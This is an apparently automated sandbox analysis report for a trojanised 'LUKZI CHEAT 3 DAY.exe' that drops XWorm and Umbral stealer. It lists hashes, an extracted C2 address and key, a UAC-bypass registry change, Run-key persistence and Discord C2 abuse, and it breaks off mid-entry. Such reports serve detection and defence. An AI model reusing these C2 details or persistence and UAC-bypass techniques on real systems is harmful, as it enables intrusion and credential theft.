Analysis
-
max time kernel
300s -
max time network
301s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
05/03/2025, 22:02
Static task
static1
Behavioral task
behavioral1
Sample
LUKZI CHEAT 3 DAY.exe
Resource
win10v2004-20250217-en
General
-
Target
LUKZI CHEAT 3 DAY.exe
-
Size
20.3MB
-
MD5
69d03c7e2b083db3e8cccad7c2a74a53
-
SHA1
7bad6b251222991bb5b91bf688ee9d2a4d57db0b
-
SHA256
4ce6de7deccb1a06aa6a77ed6efca36fa9bf9dd9a83fa390b011cbba6dc61fc1
-
SHA512
192befdb4d19881848c4b3d560363e828fc579859bcc8db9d84836c0adfeec05205660114129bc897ed13129a81878b74e06a70657f4b7a1fb8f3e560cbc679f
-
SSDEEP
393216:gUHyrS/7hf6ETSBHwD3xAk/yzmAhy7M3WzkQYFKyOkgoPY25a5Xt8eox7F1GYVAw:gUHyUhf9TWexVPAhy7MWk5ngiY2MJoxJ
Malware Config
Extracted
xworm
3.1
185.172.175.125:5000
Uto2xJheY5reQlME
-
Install_directory
%AppData%
-
install_file
USB.exe
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000024161-3151.dat family_umbral behavioral1/memory/3460-3165-0x00000247A5470000-0x00000247A54B0000-memory.dmp family_umbral -
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral1/files/0x0007000000024153-1192.dat family_xworm behavioral1/memory/3000-1197-0x0000000000E20000-0x0000000000E2E000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1668 created 612 1668 powershell.EXE 5 -
UAC bypass 3 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConSENtprOmPTbEHAViorAdMIN = "0" powershell.exe -
Umbral family
-
Xworm family
-
Blocklisted process makes network request 3 IoCs
flow pid Process 4 4720 powershell.exe 35 4720 powershell.exe 55 4844 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 4720 powershell.exe 1588 powershell.exe 1064 powershell.exe 2244 powershell.exe 3032 powershell.exe 1808 powershell.exe 436 powershell.exe 4316 powershell.exe 4844 powershell.exe 1668 powershell.EXE -
Downloads MZ/PE file 3 IoCs
flow pid Process 35 4720 powershell.exe 55 4844 powershell.exe 4 4720 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate wmiprvse.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation LUKZI CHEAT 3 DAY.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation svOrbEl0.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk svOrbEl0.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svOrbEl0.lnk svOrbEl0.exe -
Executes dropped EXE 12 IoCs
pid Process 1364 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 5036 FMyUS.eXe 4312 VjTDlRoV.exe 3000 svOrbEl0.exe 1824 1ZRs6.EXe 1944 svOrbEl0.exe 3460 winglog32.exe 5572 svOrbEl0.exe 5328 svOrbEl0.exe 2980 svOrbEl0.exe 4588 svOrbEl0.exe -
Loads dropped DLL 45 IoCs
pid Process 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe 1876 LUKZI CHEAT 3 DAY.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svOrbEl0 = "C:\\Users\\Admin\\AppData\\Roaming\\svOrbEl0.exe" svOrbEl0.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 27 discord.com 36 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 81 ip-api.com -
Drops file in System32 directory 13 IoCs
description ioc Process File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1668 set thread context of 396 1668 powershell.EXE 116 -
Detects Pyinstaller 1 IoCs
resource yara_rule behavioral1/files/0x0009000000023c92-6.dat pyinstaller -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FMyUS.eXe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1ZRs6.EXe -
Checks SCSI registry key(s) 3 TTPs 18 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags wmiprvse.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 5 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier wmiprvse.exe -
Modifies data under HKEY_USERS 63 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={F8BFD2AA-0BC2-44D7-8910-C23D48C0DD68}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property mousocoreworker.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1741212240" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d386185f9dc24b46812a7ced8049b37200000000020000000000106600000001000020000000abfe8d85f7a307d60613e0fe4dd8f7b111db3f6ca60a0423e4cc21a6aabc0fe8000000000e8000000002000020000000f3fb54edbe4e39364210ec313aa26ead7ae212f7cdf6e80e1dd8fc7015cde58b1006000059ab19427af415a0820dbb183907006ca875e97ff2bc95c80a23f393577193594e7c0097eaf16148086fad7b094a2c5e1ca81f738a31516a370e108eaa243c883fbe1b843190fe9ec895d138de6492600a8a8939f808943de4a897830b882cadf70900b493a57170d2328f5acc0ded75bfb54c7b861270cd86763ac6149e8b93f4afc72582a18f023c9e94f9962797dafb3e0d7fd5a7f81b0c5b555708e58c415f793f29e8b973f8ef9537bf10e7562f0d343689bc4add41b8aea9ea8459143c9821f00892132dfd59b9c87a76c2c144654e05f5843baf7fc9759e11ebe2bbb215ac6fa54834dd6299fdfb648895e255c4f98c1d7aa6c44906ee490f479a2d5269c9ed0adace8c08bacabea719008b17b9fe9b101cd62ffe02fb40ad1575d6387cc80a32b39d4fb8c74b632f569c1404d1c6d8cd46075470e36fee1db6551ba149f1fc5f214e8b462be4a6f5d975e3bba3a738f83faf46e9ed5eb44eb5b7b5b8e8fb3a82812a95c325eb51435a7ba1cf27df6835cf8c5937fb38413404e5493f80d5fd9a1a30acc6d790290aab310a04179c427e1d4ac965ee5e9ee95ee7645c9119c8ab59e7bd2f99a540166598f7faa3bfee4f2166fa6b4d10cda0c2620dc7ddbdc62c62637961463b54e65ec0b0b80bfe239dbdc82610b30fca290f8503e33c71aeac24fef9ece3e4ed8967d9015f3be0b3e54eb32890f3b9d542c8418596c92b4e418fb298b708ee73c129625bd6e4480be8921e145d5422eb51112db5036e26e610f39757aa3b1f4eb4c5f7a6a84a1f68d597ae13c8939ae615acfc23d8a92c570bcec694d6c16c8e926a8da779f95da54c3cac8ca115d1be34bd8db222ada20ce701e00bc14dfca849006b8ba22f107283cd33309f9e7bf8846098835dfae1d47dc14046aa5baac083cfb7795635e790c8a6d76ddaf88cfc5e45771e43a0a2225b5a10764f019e8cfbc61635b2c4f2a9bb588bda55d82d2793841dce4d4e33a1f350763d9d3841742fbe0d9504c3106801044a2b4eb59af0c07f172f57d669f4cabf5aa9a6efe625ff8f5dc8412ea38cca30813504d3de6b052c4168f58a90f40dad501d53764c76a2110fce863629b9d9f1f3e359f2c790465dbbf2709227610050f550ed2f8c8188133a8e3c521ac57594858561a357946b8dd60e764a6b423d607026db53bfa0ff51b5c9015f40f33bb68206dd3f02747b4911995dc31c00205b203368925d30da88906c8a0cdf92aea5a473f72cac0782bbac57fb62eca0c3a57a74c99452b0c2cc15fc4a44fa29df00881652b472dd5880a349e2cf59996ed7e7985f31228becb8ef2d136f918fa91fa376a751d4063f3a9ad4b8d0faf62f16def6c44ce62b3ff00ec749b105d596ad131f44c31f87888ee823102067c44d513c6b9ac676c5d93100a3e5708fb39060e5fc86561e4cf267e2c53f769b8548d086ddd2093240e4b2b3c85ee8b7c7cf3e7d804cae801635b6fb5b2f7ab7a1b3b3ceb0b299378f1d6953a0a9c7788ccabb0c2cb38f7e722bbb05cd375350241ccb3351a813fbd9bec4353fa2ad04703c07f38ef1754bd72f81f3539dfedea09efb680df05a0c753c159e3220763be1af805b45b4e58c3f7aec276d49c34d89c4a5a4439e3cef4fb4f72aff784372e1097daddd4f4a27790d6ef0ce7de0d57fd19d4fe9be586cfcefdd60a208502bd43e2da5dca76090fbbcef5a8462f080f066fd1bef9cf8173839a183dd4b014a45d86a71f3d81bfb025dfd0f57fa89bdb5a61cd9b58dc9cd2233eac90d32529c13316c1848afc30ee36ee68c80c91b7a6792c9dee1d5201695ee3dfacec76e9df80abdd2aeebc99086b5a85bebe18c9ebf19f61a14ad05c4057caaace276607aa9e149d878e26b0ec273396630e0312e6d0a6827b5a50e2c8090d9f5e07a98d079cb36bbdb3a75da390c34c322011302067192190e299c6ec3e272230ff0ebb59d09754b7fd859ab5eacdf62db2b327213f529b47aaa984c74965b3ffcb3ef3ac9c5ca0e9245bf3c22c670a7ed1252f767d3583f12b4862af664379936313a478740a9e16b94db894d9e6ec9ff33eb96be95d453265dab82b672966303fa888cfc51d1ea16c6654d84204aa2f97a3dccdb8fc21bb6af40f8947626f49ee6ee86e2e3f89ffcd561122ee636556b7d3275ca463f3c46c36a03b434f1f43eaa40000000fd2b70211765c3a8c31936793c67978870b65d05cfac5643899d81e03700b166c2943523cec062321c685ccb6129a8806c6c5fbd00cfc25fcb838b7b00ad9344 mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Property\0018C0103724F093 = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000d386185f9dc24b46812a7ced8049b372000000000200000000001066000000010000200000008657aea3e7e220f866dcd27463cb209a4a7cecaeabea057a8669600f021c40b7000000000e8000000002000020000000739e24d08de07e19803e0572533af754b045160e8b59481b2981191d5e8aed3280000000bc1a3159cd07048649b44a8628648ffa65d380b7014e7f06b6be0ae95c7304fb58e4d149310da25947971c0ad6cd60e6ea198b4c2f405ee6af3511fe77652bebe2a577d4ac0e7da146d4c9eb401ef810423e57649bc796049fb207cb94d0f2ae8024dfbb3405104f937436ee547bb078dee7093376b8dcbcef59013d8afb7e7c40000000344df362c77efd3d070c7661c635c884c615547757725dba7b1eb25be1b858c2e15303f7b4ffa48a075af1cdb000491161e5e9966b3f391bca5e6256ab188a61 mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 50,1329 10,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceId = "0018C0103724F093" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Wed, 05 Mar 2025 22:04:02 GMT" OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414} mousocoreworker.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "0018C0103724F093" svchost.exe -
Modifies registry class 21 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\a3d6c87e-6ed5-4064-a = ae9e6e801a8edb01 RuntimeBroker.exe Set value (data) \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\4b475ec8-82f2-495f-a = 